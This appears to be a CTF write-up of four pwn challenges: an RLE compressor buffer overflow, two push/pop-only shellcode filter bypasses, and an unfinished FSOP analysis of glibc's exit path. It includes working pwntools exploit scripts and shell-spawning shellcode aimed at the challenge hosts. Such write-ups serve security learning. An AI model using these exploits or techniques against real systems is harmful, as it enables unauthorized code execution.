zip++#

Information#

Category: Pwn
Points: 500

Description#

why isn’t my compressor compressing ?!

Write-up#

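I asked an AI and learned that the compress function implements RLE (Run-Length Encoding). The compressed format is [byte 1][count 1][byte 2][count 2]..., so feeding it alternating characters makes the compression ratio terrible: every input byte turns into two output bytes, and the output overflows into the return address.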
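
To see why alternating bytes are the worst case, here is a minimal Python sketch of an RLE encoder using the [byte][count] layout described above. It is a model for illustration only, not the binary's actual compress: the name rle_compress and the cap of 255 per run are my assumptions.

```python
def rle_compress(data: bytes) -> bytes:
    """Toy RLE: emit [byte][count] pairs, capping each run at 255 (assumed)."""
    out = bytearray()
    i = 0
    while i < len(data):
        run = 1
        # Extend the run while the next byte repeats and the count fits in one byte.
        while i + run < len(data) and data[i + run] == data[i] and run < 255:
            run += 1
        out += bytes([data[i], run])
        i += run
    return bytes(out)


alternating = b"AB" * 0xC6   # same prefix as the exploit payload
tail = b"\xa6" * 0x11        # same suffix as the exploit payload

print(hex(len(alternating)), "->", hex(len(rle_compress(alternating))))
print(rle_compress(tail).hex())
```

Under this model the 0x18c-byte AB prefix doubles to 0x318 bytes, while the trailing run of 0x11 \xa6 bytes collapses to just a6 11. That would explain the shape of the payload: presumably those two bytes are what lands on the low bytes of the return address.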

Exploit#

#!/usr/bin/env python3

from pwn import (
    ELF,
    args,
    context,
    flat,
    process,
    raw_input,
    remote,
)


FILE = "./main"
HOST, PORT = "pwn-14caf623.p1.securinets.tn", 9000

context(log_level="debug", binary=FILE, terminal="kitty")

elf = context.binary


def launch():
    global target
    if args.L:
        target = process(FILE)
    else:
        target = remote(HOST, PORT)


def main():
    launch()

    payload = flat(
        b"AB" * 0xC6,
        b"\xa6" * 0x11,
    )
    raw_input("DEBUG")
    target.sendafter(b"data to compress :", payload)
    raw_input("DEBUG")
    target.sendline(b"exit")

    target.interactive()


if __name__ == "__main__":
    main()

Flag#

Securinets{my_zip_doesnt_zip}

push pull pops#

Information#

Category: Pwn
Points: 500

Description#

Shellcoding in the big 25 😱

Write-up#

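Interesting: this is the first time I have seen a pwn challenge written in Python. It only allows the push, pop and int 3 instructions, but testing shows that an illegal instruction makes capstone return None right away, so nothing after it gets checked. All we have to do is put the shellcode after an illegal instruction.

Time to bring out the opcode table: X86 Opcode and Instruction Reference Home

There is one problem: execution starts at the address mmap returned, so it is bound to run into our illegal instruction and abort. The fix is simple as well. Since we can manipulate the stack, we point rsp at the mmap'd address, use pop to move the stack pointer up first, and then push to move it back down, which also overwrites the instructions that were sitting there. Overwrite them with what? nop, of course.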
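
The pop-then-push trick can be modelled in a few lines of Python. This is only a sketch of the memory effect, not an emulator: the instruction bytes are hand-assembled (push r11 = 41 53, pop rsp = 5c, pop r15 = 41 5f, push r15 = 41 57), rsp is tracked as an offset from the mmap base, r11 is assumed to hold that base, and the 0xcc filler standing in for the shellcode is hypothetical.

```python
import struct

# Prologue of the payload: push r11; pop rsp; pop r15 x4; push r15 x3
PROLOGUE = bytes.fromhex("4153" + "5c" + "415f" * 4 + "4157" * 3)
ILLEGAL = b"\x06"                # not a valid opcode in 64-bit mode
NOPS = b"\x90" * 0xF

# 0xcc bytes stand in for the shellcode that follows (hypothetical filler).
mem = bytearray(PROLOGUE + ILLEGAL + NOPS + b"\xcc" * 0x20)
illegal_at = len(PROLOGUE)       # offset of the illegal byte

rsp = 0                          # after `push r11; pop rsp` (offset from the mmap base)


def pop() -> int:
    """Read a little-endian qword at rsp and move rsp up by 8."""
    global rsp
    value = struct.unpack_from("<Q", mem, rsp)[0]
    rsp += 8
    return value


def push(value: int) -> None:
    """Move rsp down by 8 and write a little-endian qword there."""
    global rsp
    rsp -= 8
    struct.pack_into("<Q", mem, rsp, value)


for _ in range(4):
    r15 = pop()                  # the last pop reads offsets 0x18..0x1f, all nops

pushes_needed = 0
while mem[illegal_at] != 0x90:   # keep pushing until the illegal byte is gone
    push(r15)
    pushes_needed += 1

print(hex(illegal_at), hex(r15), pushes_needed)
```

In this model the fourth pop loads eight nop bytes into r15, and the second push already rewrites the qword that contains the illegal byte, so by the time execution gets there it finds a nop sled instead.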

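Finally, a note on debugging. Once we know the pid of the Python script we can attach with gdb -p <pid>, and once we know the address mmap returned we can debug the shellcode. Making good use of int 3 matters a lot too.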

import ctypes
import mmap
import os


def run(code: bytes):
    # Allocate executable memory using mmap

    mem = mmap.mmap(
        -1, len(code), prot=mmap.PROT_READ | mmap.PROT_WRITE | mmap.PROT_EXEC
    )
    mem.write(code)

    # Create function pointer and execute
    func = ctypes.CFUNCTYPE(ctypes.c_void_p)(
        ctypes.addressof(ctypes.c_char.from_buffer(mem))
    )

    # Debug aid: print the pid and the mmap address, then wait so gdb can attach
    print(
        f"pid is: {os.getpid()}\nmem: {hex(ctypes.addressof(ctypes.c_char.from_buffer(mem)))}"
    )
    input("DEBUG")
    func()

    exit(1)

Exploit#

#!/usr/bin/env python3

import argparse

from pwn import (
    ELF,
    asm,
    b64e,
    context,
    flat,
    process,
    raw_input,
    remote,
    shellcraft,
)

parser = argparse.ArgumentParser()
parser.add_argument("-L", "--local", action="store_true", help="Run locally")
parser.add_argument("-G", "--gdb", action="store_true", help="Enable GDB")
parser.add_argument("-P", "--port", type=int, default=1234, help="GDB port for QEMU")
parser.add_argument("-T", "--threads", type=int, default=None, help="Thread count")
args = parser.parse_args()


FILE = "./main.py"
HOST, PORT = "localhost", 1337

context(log_level="debug", terminal="kitty", arch="amd64")


def mangle(pos, ptr, shifted=1):
    if shifted:
        return pos ^ ptr
    return (pos >> 12) ^ ptr


def demangle(pos, ptr, shifted=1):
    if shifted:
        return mangle(pos, ptr)
    return mangle(pos, ptr, 0)


def launch(argv=None, envp=None):
    global target, thread

    if argv is None:
        argv = [FILE]

    if args.local and args.threads is not None:
        raise ValueError("Options -L and -T cannot be used together.")

    if args.local:
        if args.gdb and "qemu" in argv[0]:
            if "-g" not in argv:
                argv.insert(1, str(args.port))
                argv.insert(1, "-g")
        target = process(argv, env=envp)
    elif args.threads:
        if args.threads <= 0:
            raise ValueError("Thread count must be positive.")
        process(FILE)

        thread = [remote(HOST, PORT, ssl=False) for _ in range(args.threads)]
    else:
        target = remote(HOST, PORT, ssl=True)


def main():
    launch()

    payload = asm(
        """
        push r11
        pop rsp

        pop r15
        pop r15
        pop r15
        pop r15

        push r15
        push r15
        push r15
        """
    )

    payload += b"\x06" + asm(shellcraft.nop()) * 0xF
    payload += asm("add rsp, 0x100")
    payload += asm(shellcraft.sh())

    target.sendline(b64e(payload))

    target.interactive()


if __name__ == "__main__":
    main()

Flag#

Securinets{push_pop_to_hero}

push pull pops REVENGE#

Information#

Category: Pwn
Points: 500

Description#

you aint getting away with it , not on my watch .

Write-up#

This time the challenge adds a check that the length of the input matches the length of the instructions that were decoded:

if code_len != decoded:
    print("nice try")
    return False

That bans illegal instructions. I also tried semantically equivalent encodings, but they did not help; there is no getting around this length check.
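
The difference between the two versions of the filter can be sketched with a toy model. This is not the challenge's code and it does not use capstone: toy_decode is a hypothetical stand-in that only knows push/pop (with or without the 0x41 REX prefix), int3 and nop, and returns None for anything else, mimicking a disassembler that simply stops at an undecodable byte.

```python
ALLOWED = {"push", "pop", "int3"}


def toy_decode(code: bytes, off: int):
    """Hypothetical mini-decoder: return (mnemonic, length) or None if undecodable."""
    b = code[off]
    if 0x50 <= b <= 0x57:
        return ("push", 1)
    if 0x58 <= b <= 0x5F:
        return ("pop", 1)
    if b == 0x41 and off + 1 < len(code):   # REX.B prefix: push/pop r8..r15
        nb = code[off + 1]
        if 0x50 <= nb <= 0x57:
            return ("push", 2)
        if 0x58 <= nb <= 0x5F:
            return ("pop", 2)
    if b == 0xCC:
        return ("int3", 1)
    if b == 0x90:
        return ("nop", 1)
    return None


def check(code: bytes, length_check: bool) -> bool:
    """Accept code if every decoded instruction is allowed.

    With length_check=True, also require that decoding consumed every byte.
    """
    decoded = 0
    while decoded < len(code):
        insn = toy_decode(code, decoded)
        if insn is None:
            break                    # decoding silently stops here
        mnemonic, size = insn
        if mnemonic not in ALLOWED:
            return False
        decoded += size
    if length_check and decoded != len(code):
        return False                 # the "nice try" branch
    return True


smuggled = b"\x50\x06\x90"           # push rax; <illegal byte>; nop
print(check(b"\x50\x90", False))     # nop is decoded and rejected
print(check(smuggled, False))        # nothing after the illegal byte is inspected
print(check(smuggled, True))         # the length check catches the undecoded tail
```

In this model the previous challenge corresponds to length_check=False, where anything placed after an undecodable byte is never inspected, and the revenge version corresponds to length_check=True.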

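The idea I ended up with is to build a syscall myself and call read, so that the shellcode can be read in without passing through the filter.

The official solution also builds a read, but in the official write-up the syscall is not crafted by hand. It reuses one that is already present in memory, so you only need to push and pop your way to that memory to pick it up. My method is a bit more complicated: ~~let's pretend memory is barren, nothing grows there, and there is no leftover syscall at all~~. Can we conjure one out of thin air?

This challenge also mmaps an rwx region, so as long as the machine code for syscall sits in our memory, execution can reach it. We only need to set up the registers that read uses before that happens.

CAUTION
Because of the nature of this challenge, the remote memory layout is bound to differ a lot from a local one. Whether we craft the syscall ourselves or look for an existing one, we depend very strictly on the memory layout, so this challenge has to run inside docker and be debugged remotely from the host.

First, sort out debugging. Change the command the container runs on startup so that it runs under gdbserver, and expose port 1234 for debugging: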

# Original command:
# CMD socat TCP-LISTEN:5000,reuseaddr,fork EXEC:/app/run
# Replacement, wrapped in gdbserver:
CMD ["gdbserver", ":1234", "socat", "TCP-LISTEN:5000,reuseaddr,fork", "EXEC:/app/run"]

docker-compose.yml needs changing as well, to expose the debug port:

version: "3.8"

services:
  vertical_tables:
    build: .
    ports:
      - "1304:5000"
      - "1234:1234"
    deploy:
      resources:
        limits:
          cpus: "1"
          memory: 1000M
    read_only: true
    cap_drop:
      - all
    privileged: true

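Now running docker compose up -d brings the container up, and the exploit connects straight to port 1304 to talk to the challenge.

Since we are building the syscall ourselves, we first need to know its machine code. Like this: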

λ ~/ pwn asm -c amd64 "syscall"
0f05

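So once we find a way to get hold of \x0f and \x05, we are halfway there. Looking at memory, there is a ready-made \x05:

There is a ready-made \x0f too, but is it usable? We can run a simple test: patch an empty piece of memory directly and see what instruction it decodes to:

It is not the syscall we hoped for. The reason is simple: amd64 is little-endian, so we cannot write \x0f; we should write 0x0f00000000000000 instead.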
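
A quick way to convince yourself of the byte order is to pack the two candidate qwords and look at where 0x0f ends up in memory. This is a small illustrative sketch using Python's struct module; the values are only the ones named in the text.

```python
import struct

low = struct.pack("<Q", 0x0F)                   # 0x0f in the least significant byte
high = struct.pack("<Q", 0x0F00000000000000)    # 0x0f in the most significant byte

print(low.hex())    # 0f comes first in memory
print(high.hex())   # 0f comes last, right before whatever follows the qword

# If the byte after the qword is 0x05, the pair 0f 05 straddles the boundary.
print((high + b"\x05")[-2:].hex())
```

With the value 0x0f00000000000000 the 0x0f byte is the eighth byte in memory, so whatever byte comes directly after the qword forms the second opcode byte.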

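Why does it have to be this way? My idea is to put a push or pop instruction that contains \x0f at the very end, use a pile of single-byte push or pop instructions to wedge that \x0f into the eighth byte position, and finally push the \x05 obtained earlier over the byte that got squeezed out next to it. That gives us a syscall.

But how do we make sure that the syscall we built actually executes? We cannot jump back to a syscall that lies behind us. This is where the previous challenge's idea helps: with an illegal instruction the CPU gets stuck there and goes no further, but once we replace the instruction ahead of us with a legal one, it carries on running.

The instruction I picked is pop fs; in my tests push fs did not work.

So my exploit is not hard to follow. The 0x4d pop r15 instructions at the start are there to get hold of \x05, which is kept in r15:

Next it sets the registers that read uses. rax can be left alone because it is already 0; we use it to set rdi, and then use a leftover value in memory to set rdx. rsi can be set at the end, when pivoting the stack back to the shellcode.

The last step is pivoting the stack back to the shellcode, using push and pop to line up with the instruction to overwrite, and finally filling in the \x05.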
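
The alignment arithmetic behind this can be checked offline. The sketch below rebuilds the payload from hand-assembled bytes (so it needs no pwntools) and applies only the memory effect of the final push r15. The encodings, the assumption that r11 holds the mmap base, and the r15 value of 0x05 (only its low byte matters here) are my assumptions for illustration.

```python
import struct


def build_payload() -> bytes:
    """Hand-assembled copy of the exploit's push/pop sequence."""
    p = bytes.fromhex("415f") * 0x4D        # pop r15 (x0x4d)
    p += bytes.fromhex("5c415f505f")        # pop rsp; pop r15; push rax; pop rdi
    p += b"\x5b" * 0x14                     # pop rbx
    p += b"\x5a"                            # pop rdx
    p += b"\x53" * 0x1B                     # push rbx
    p += bytes.fromhex("41535e41535c")      # push r11; pop rsi; push r11; pop rsp
    p += b"\x5b" * 0x20                     # pop rbx
    p += bytes.fromhex("4157")              # push r15
    p += b"\x0f\xa1"                        # pop fs
    return p


payload = build_payload()
mem = bytearray(payload.ljust(0x100, b"\x00"))

# After `push r11; pop rsp`, rsp is the mmap base (offset 0 here);
# 0x20 pops move it up to offset 0x100.
rsp = 0x20 * 8

# push r15: rsp -= 8, then store r15 little-endian at the new rsp.
r15 = 0x05                                  # hypothetical: only the low byte matters
rsp -= 8
struct.pack_into("<Q", mem, rsp, r15)

print(hex(payload.index(b"\x0f\xa1")), hex(rsp), mem[0xF7:0xF9].hex())
```

The \x0f of pop fs sits at offset 0xf7, the last byte of a qword, and the push writes at offset 0xf8, so its low byte replaces the \xa1 and the two bytes read 0f 05 by the time execution reaches them.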

Exploit#

#!/usr/bin/env python3

import argparse

from pwn import (
    ELF,
    asm,
    b64e,
    context,
    flat,
    process,
    raw_input,
    remote,
    shellcraft,
    sleep,
)

parser = argparse.ArgumentParser()
parser.add_argument("-L", "--local", action="store_true", help="Run locally")
parser.add_argument("-G", "--gdb", action="store_true", help="Enable GDB")
parser.add_argument("-P", "--port", type=int, default=1234, help="GDB port for QEMU")
parser.add_argument("-T", "--threads", type=int, default=None, help="Thread count")
args = parser.parse_args()


FILE = "./main.py"
HOST, PORT = "localhost", 1304

context(log_level="debug", terminal="kitty", arch="amd64")


def mangle(pos, ptr, shifted=1):
    if shifted:
        return pos ^ ptr
    return (pos >> 12) ^ ptr


def demangle(pos, ptr, shifted=1):
    if shifted:
        return mangle(pos, ptr)
    return mangle(pos, ptr, 0)


def launch(argv=None, envp=None):
    global target, thread

    if argv is None:
        argv = [FILE]

    if args.local and args.threads is not None:
        raise ValueError("Options -L and -T cannot be used together.")

    if args.local:
        if args.gdb and "qemu" in argv[0]:
            if "-g" not in argv:
                argv.insert(1, str(args.port))
                argv.insert(1, "-g")
        target = process(argv, env=envp)
    elif args.threads:
        if args.threads <= 0:
            raise ValueError("Thread count must be positive.")
        process(FILE)

        thread = [remote(HOST, PORT, ssl=False) for _ in range(args.threads)]
    else:
        target = remote(HOST, PORT, ssl=False)


def main():
    launch()

    payload = asm("pop r15") * 0x4D
    payload += asm(
        """
        pop rsp
        pop r15

        push rax
        pop rdi
        """
    )
    payload += asm("pop rbx") * 0x14
    payload += asm("pop rdx")
    payload += asm("push rbx") * 0x1B
    payload += asm(
        """
        push r11
        pop rsi

        push r11
        pop rsp
        """
    )
    payload += asm("pop rbx") * 0x20
    payload += asm("push r15")
    payload += b"\x0f\xa1"

    target.sendline(b64e(payload))
    target.sendline()

    sc = asm(shellcraft.nop() * 0x150 + shellcraft.sh())
    sleep(1)
    target.sendline(sc)

    target.interactive()


if __name__ == "__main__":
    main()

Flag#

Reproduced after the event.

V-tables#

Information#

Category: Pwn
Points: 500

Description#

idk

Write-up#

This one is a reproduction as well. I had not learned FSOP at the time, so I simply skipped it...

After reading the official write-up, I found that this kind of challenge does follow a pattern.

First a look in IDA. The logic is very simple:

void __fastcall setup(int argc, const char **argv, const char **envp)
{
  setbuf(stdin, 0);
  setbuf(stdout, 0);
}

__int64 vuln()
{
  printf("stdout : %p\n", stdout);
  read(0, stdout, 0xD8u);
  return 0;
}

int __fastcall main(int argc, const char **argv, const char **envp)
{
  setup(argc, argv, envp);
  vuln();
  return 0;
}

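We are handed a libc address for free and can then modify the stdout structure. But we can read at most 0xD8 bytes, which covers exactly the whole _IO_FILE structure and stops just short of the vtable field. So the usual House of Apple is off the table.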
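
To double-check that 0xD8 bytes stop right before vtable, the structure can be mirrored with ctypes. This is a sketch under assumptions: the field list follows the usual x86-64 glibc layout of struct _IO_FILE as I understand it, pointers are modelled as 64-bit integers, and the class names IOFile and IOFilePlus are mine.

```python
import ctypes

PTR = ctypes.c_uint64  # model every pointer as a 64-bit integer


class IOFile(ctypes.Structure):
    """Assumed x86-64 layout of glibc's struct _IO_FILE."""
    _fields_ = [
        ("_flags", ctypes.c_int32),
        ("_IO_read_ptr", PTR),
        ("_IO_read_end", PTR),
        ("_IO_read_base", PTR),
        ("_IO_write_base", PTR),
        ("_IO_write_ptr", PTR),
        ("_IO_write_end", PTR),
        ("_IO_buf_base", PTR),
        ("_IO_buf_end", PTR),
        ("_IO_save_base", PTR),
        ("_IO_backup_base", PTR),
        ("_IO_save_end", PTR),
        ("_markers", PTR),
        ("_chain", PTR),
        ("_fileno", ctypes.c_int32),
        ("_flags2", ctypes.c_int32),
        ("_old_offset", ctypes.c_int64),
        ("_cur_column", ctypes.c_uint16),
        ("_vtable_offset", ctypes.c_int8),
        ("_shortbuf", ctypes.c_char * 1),
        ("_lock", PTR),
        ("_offset", ctypes.c_int64),
        ("_codecvt", PTR),
        ("_wide_data", PTR),
        ("_freeres_list", PTR),
        ("_freeres_buf", PTR),
        ("_pad5", ctypes.c_uint64),
        ("_mode", ctypes.c_int32),
        ("_unused2", ctypes.c_char * 20),
    ]


class IOFilePlus(ctypes.Structure):
    """struct _IO_FILE_plus: the FILE followed by the vtable pointer."""
    _fields_ = [("file", IOFile), ("vtable", PTR)]


print(hex(ctypes.sizeof(IOFile)), hex(IOFilePlus.vtable.offset), hex(IOFile._mode.offset))
```

Under these assumptions the read of 0xD8 bytes reaches every field up to and including _unused2, while vtable starts at offset 0xD8 and stays untouched. The _mode offset of 0xC0 also matches the 0xa8 + 0x18 arithmetic used for fp.unknown2 in the exploit.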

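What now? Is there nothing left to exploit? Not necessarily.

First, the final call chain:

If you are familiar with the program life cycle, you know that returning from main automatically calls exit. Since there is nothing else we can do, the job is most likely to analyse the exit flow and look for something exploitable (it feels a bit like being led by the nose).

exit is implemented as follows:

void
exit (int status)
{
  __run_exit_handlers (status, &__exit_funcs, true, true);
}
libc_hidden_def (exit)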

Follow straight into __run_exit_handlers:


/* Call all functions registered with `atexit' and `on_exit',
   in the reverse of the order in which they were registered
   perform stdio cleanup, and terminate program execution with STATUS.  */
void
attribute_hidden
__run_exit_handlers (int status, struct exit_function_list **listp,
                     bool run_list_atexit, bool run_dtors)
{
  /* The exit should never return, so there is no need to unlock it.  */
  __libc_lock_lock_recursive (__exit_lock);

  /* First, call the TLS destructors.  */
  if (run_dtors)
    call_function_static_weak (__call_tls_dtors);

  __libc_lock_lock (__exit_funcs_lock);

  /* We do it this way to handle recursive calls to exit () made by
     the functions registered with `atexit' and `on_exit'. We call
     everyone on the list and use the status value in the last
     exit (). */
  while (true)
    {
      struct exit_function_list *cur;

    restart:
      cur = *listp;

      if (cur == NULL)
        {
          /* Exit processing complete.  We will not allow any more
             atexit/on_exit registrations.  */
          __exit_funcs_done = true;
          break;
        }

      while (cur->idx > 0)
        {
          struct exit_function *const f = &cur->fns[--cur->idx];
          const uint64_t new_exitfn_called = __new_exitfn_called;

          switch (f->flavor)
            {
              void (*atfct) (void);
              void (*onfct) (int status, void *arg);
              void (*cxafct) (void *arg, int status);
              void *arg;

            case ef_free:
            case ef_us:
              break;
            case ef_on:
              onfct = f->func.on.fn;
              arg = f->func.on.arg;
              PTR_DEMANGLE (onfct);

              /* Unlock the list while we call a foreign function.  */
              __libc_lock_unlock (__exit_funcs_lock);
              onfct (status, arg);
              __libc_lock_lock (__exit_funcs_lock);
              break;
            case ef_at:
              atfct = f->func.at;
              PTR_DEMANGLE (atfct);

              /* Unlock the list while we call a foreign function.  */
              __libc_lock_unlock (__exit_funcs_lock);
              atfct ();
              __libc_lock_lock (__exit_funcs_lock);
              break;
            case ef_cxa:
              /* To avoid dlclose/exit race calling cxafct twice (BZ 22180),
                 we must mark this function as ef_free.  */
              f->flavor = ef_free;
              cxafct = f->func.cxa.fn;
              arg = f->func.cxa.arg;
              PTR_DEMANGLE (cxafct);

              /* Unlock the list while we call a foreign function.  */
              __libc_lock_unlock (__exit_funcs_lock);
              cxafct (arg, status);
              __libc_lock_lock (__exit_funcs_lock);
              break;
            }

          if (__glibc_unlikely (new_exitfn_called != __new_exitfn_called))
            /* The last exit function, or another thread, has registered
               more exit functions.  Start the loop over.  */
            goto restart;
        }

      *listp = cur->next;
      if (*listp != NULL)
        /* Don't free the last element in the chain, this is the statically
           allocate element.  */
        free (cur);
    }

  __libc_lock_unlock (__exit_funcs_lock);

  if (run_list_atexit)
    call_function_static_weak (_IO_cleanup);

  _exit (status);
}

Nothing fun stands out here except _IO_cleanup. It involves IO operations, so it is worth following:

int
_IO_cleanup (void)
{
  int result = _IO_flush_all ();

  /* We currently don't have a reliable mechanism for making sure that
     C++ static destructors are executed in the correct order.
     So it is possible that other static destructors might want to
     write to cout - and they're supposed to be able to do so.

     The following will make the standard streambufs be unbuffered,
     which forces any output from late destructors to be written out. */
  _IO_unbuffer_all ();

  return result;
}

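At this point there are two big functions to analyse: _IO_flush_all and _IO_unbuffer_all.

While analysing _IO_flush_all I did not find anything particularly interesting, but it can call _IO_OVERFLOW, which in turn can call _IO_do_write. That suggested an approach. When main returns and _IO_cleanup->_IO_flush_all flushes the _IO_2_1_stdout_ structure, suppose we have already pointed its _IO_write_base at the _IO_2_1_stdin_ structure. The size is computed as f->_IO_write_ptr - f->_IO_write_base, so I can make that large too. That would trigger _IO_do_write and write an arbitrary amount of data into _IO_2_1_stdin_, overwriting its vtable. Since the _IO_list_all list is ordered stderr->stdout->stdin, once stdout has been flushed and stdin is flushed next, would it not call my custom vtable and do whatever I want?

A lovely idea, but then I found that _IO_do_write (f, f->_IO_write_base, f->_IO_write_ptr - f->_IO_write_base)->_IO_SYSWRITE (fp, data, to_do)->__write (f->_fileno, data, to_do). In other words, _IO_write_base is the source of the write, and the data can only go to the _fileno of the structure being flushed... so that road is closed.

There is one more idea: set _chain to the address of the current structure + 0x8, which forges the next structure to be flushed. Because of the +0x8 shift we would control vtable as well, but we would not control _flags. I do not know whether it works; it is just a potentially viable idea to try some other time.

Moving on to _IO_unbuffer_all below, to see whether anything turns up: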


static void
_IO_unbuffer_all (void)
{
  FILE *fp;

#ifdef _IO_MTSAFE_IO
  _IO_cleanup_region_start_noarg (flush_cleanup);
  _IO_lock_lock (list_all_lock);
#endif

  for (fp = (FILE *) _IO_list_all; fp; fp = fp->_chain)
    {
      int legacy = 0;

      run_fp = fp;
      _IO_flockfile (fp);

#if SHLIB_COMPAT (libc, GLIBC_2_0, GLIBC_2_1)
      if (__glibc_unlikely (_IO_vtable_offset (fp) != 0))
        legacy = 1;
#endif

      /* Free up the backup area if it was ever allocated.  */
      if (_IO_have_backup (fp))
        _IO_free_backup_area (fp);
      if (!legacy && fp->_mode > 0 && _IO_have_wbackup (fp))
        _IO_free_wbackup_area (fp);

      if (! (fp->_flags & _IO_UNBUFFERED)
          /* Iff stream is un-orientated, it wasn't used. */
          && (legacy || fp->_mode != 0))
        {
          if (! legacy && ! dealloc_buffers && !(fp->_flags & _IO_USER_BUF))
            {
              fp->_flags |= _IO_USER_BUF;

              fp->_freeres_list = freeres_list;
              freeres_list = fp;
              fp->_freeres_buf = fp->_IO_buf_base;
            }

          _IO_SETBUF (fp, NULL, 0);

          if (! legacy && fp->_mode > 0)
            _IO_wsetb (fp, NULL, NULL, 0);
        }

      /* Make sure that never again the wide char functions can be
         used.  */
      if (! legacy)
        fp->_mode = -1;

      _IO_funlockfile (fp);
      run_fp = NULL;
    }

#ifdef _IO_MTSAFE_IO
  _IO_lock_unlock (list_all_lock);
  _IO_cleanup_region_end (0);
#endif
}

Notice that following _IO_SETBUF downwards leads to something fun:

FILE *
_IO_default_setbuf (FILE *fp, char *p, ssize_t len)
{
    if (_IO_SYNC (fp) == EOF)
        return NULL;
    if (p == NULL || len == 0)
      {
        fp->_flags |= _IO_UNBUFFERED;
        _IO_setb (fp, fp->_shortbuf, fp->_shortbuf+1, 0);
      }
    else
      {
        fp->_flags &= ~_IO_UNBUFFERED;
        _IO_setb (fp, p, p+len, 0);
      }
    fp->_IO_write_base = fp->_IO_write_ptr = fp->_IO_write_end = NULL;
    fp->_IO_read_base = fp->_IO_read_ptr = fp->_IO_read_end = NULL;
    return fp;
}

It is hidden inside _IO_SYNC:

int
_IO_new_file_sync (FILE *fp)
{
  ssize_t delta;
  int retval = 0;

  /*    char* ptr = cur_ptr(); */
  if (fp->_IO_write_ptr > fp->_IO_write_base)
    if (_IO_do_flush(fp)) return EOF;
  delta = fp->_IO_read_ptr - fp->_IO_read_end;
  if (delta != 0)
    {
      off64_t new_pos = _IO_SYSSEEK (fp, delta, 1);
      if (new_pos != (off64_t) EOF)
        fp->_IO_read_end = fp->_IO_read_ptr;
      else if (errno == ESPIPE)
        ; /* Ignore error from unseekable devices. */
      else
        retval = EOF;
    }
  if (retval != EOF)
    fp->_offset = _IO_pos_BAD;
  /* FIXME: Cleanup - can this be shared? */
  /*    setg(base(), ptr, ptr); */
  return retval;
}
libc_hidden_ver (_IO_new_file_sync, _IO_file_sync)

Next comes _IO_do_flush. Since mode was already set to 1, this executes _IO_wdo_write, which is exactly what we want.

#define _IO_do_flush(_f)                                        \
  ((_f)->_mode <= 0                                             \
   ? _IO_do_write(_f, (_f)->_IO_write_base,                     \
    (_f)->_IO_write_ptr-(_f)->_IO_write_base)                   \
   : _IO_wdo_write(_f, (_f)->_wide_data->_IO_write_base,        \
     ((_f)->_wide_data->_IO_write_ptr                           \
      - (_f)->_wide_data->_IO_write_base)))

Once we reach _IO_wdo_write we are nearly done.

/* Convert TO_DO wide character from DATA to FP.
   Then mark FP as having empty buffers. */
int
_IO_wdo_write (FILE *fp, const wchar_t *data, size_t to_do)
{
  struct _IO_codecvt *cc = fp->_codecvt;

  if (to_do > 0)
    {
      if (fp->_IO_write_end == fp->_IO_write_ptr
          && fp->_IO_write_end != fp->_IO_write_base)
        {
          if (_IO_new_do_write (fp, fp->_IO_write_base,
                                fp->_IO_write_ptr - fp->_IO_write_base) == EOF)
            return WEOF;
        }

      do
        {
          enum __codecvt_result result;
          const wchar_t *new_data;
          char mb_buf[MB_LEN_MAX];
          char *write_base, *write_ptr, *buf_end;

          if (fp->_IO_buf_end - fp->_IO_write_ptr < sizeof (mb_buf))
            {
              /* Make sure we have room for at least one multibyte
                 character.  */
              write_ptr = write_base = mb_buf;
              buf_end = mb_buf + sizeof (mb_buf);
            }
          else
            {
              write_ptr = fp->_IO_write_ptr;
              write_base = fp->_IO_write_base;
              buf_end = fp->_IO_buf_end;
            }

          /* Now convert from the internal format into the external buffer.  */
          result = __libio_codecvt_out (cc, &fp->_wide_data->_IO_state,
                                        data, data + to_do, &new_data,
                                        write_ptr,
                                        buf_end,
                                        &write_ptr);

          /* Write out what we produced so far.  */
          if (_IO_new_do_write (fp, write_base, write_ptr - write_base) == EOF)
            /* Something went wrong.  */
            return WEOF;

          to_do -= new_data - data;

          /* Next see whether we had problems during the conversion.  If yes,
             we cannot go on.  */
          if (result != __codecvt_ok
              && (result != __codecvt_partial || new_data - data == 0))
            break;

          data = new_data;
        }
      while (to_do > 0);
    }

  _IO_wsetg (fp, fp->_wide_data->_IO_buf_base, fp->_wide_data->_IO_buf_base,
             fp->_wide_data->_IO_buf_base);
  fp->_wide_data->_IO_write_base = fp->_wide_data->_IO_write_ptr
    = fp->_wide_data->_IO_buf_base;
  fp->_wide_data->_IO_write_end = ((fp->_flags & (_IO_LINE_BUF | _IO_UNBUFFERED))
                                   ? fp->_wide_data->_IO_buf_base
                                   : fp->_wide_data->_IO_buf_end);

  return to_do == 0 ? 0 : WEOF;
}
libc_hidden_def (_IO_wdo_write)

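The DL_CALL_FCT below turns out to be a function call, and both the function pointer and its argument can be forged by overlapping structures.

Ideally we would make gs a pointer to /bin/sh and make __fct system. In practice, debugging shows that as soon as we control either one, we lose control of the other: control /bin/sh and we cannot get past PTR_DEMANGLE (fct); get past PTR_DEMANGLE (fct) and we cannot control /bin/sh. All of this is because the register used at the assembly level is r15. You can debug this yourself; I do not want to take all those screenshots again, and honestly it is a bit sickening... Arbitrary code execution matters more, so I chose to control __fct and set up /bin/sh through the gadget add rdi, 0x10; jmp rcx.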

#define DL_CALL_FCT(fctp, args) (fctp) args

enum __codecvt_result
__libio_codecvt_out (struct _IO_codecvt *codecvt, __mbstate_t *statep,
                     const wchar_t *from_start, const wchar_t *from_end,
                     const wchar_t **from_stop, char *to_start, char *to_end,
                     char **to_stop)
{
  enum __codecvt_result result;

  struct __gconv_step *gs = codecvt->__cd_out.step;
  int status;
  size_t dummy;
  const unsigned char *from_start_copy = (unsigned char *) from_start;

  codecvt->__cd_out.step_data.__outbuf = (unsigned char *) to_start;
  codecvt->__cd_out.step_data.__outbufend = (unsigned char *) to_end;
  codecvt->__cd_out.step_data.__statep = statep;

  __gconv_fct fct = gs->__fct;
  if (gs->__shlib_handle != NULL)
    PTR_DEMANGLE (fct);

  status = DL_CALL_FCT (fct,
                        (gs, &codecvt->__cd_out.step_data, &from_start_copy,
                         (const unsigned char *) from_end, NULL,
                         &dummy, 0, 0));

  *from_stop = (wchar_t *) from_start_copy;
  *to_stop = (char *) codecvt->__cd_out.step_data.__outbuf;

  switch (status)
    {
    case __GCONV_OK:
    case __GCONV_EMPTY_INPUT:
      result = __codecvt_ok;
      break;

    case __GCONV_FULL_OUTPUT:
    case __GCONV_INCOMPLETE_INPUT:
      result = __codecvt_partial;
      break;

    default:
      result = __codecvt_error;
      break;
    }

  return result;
}
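
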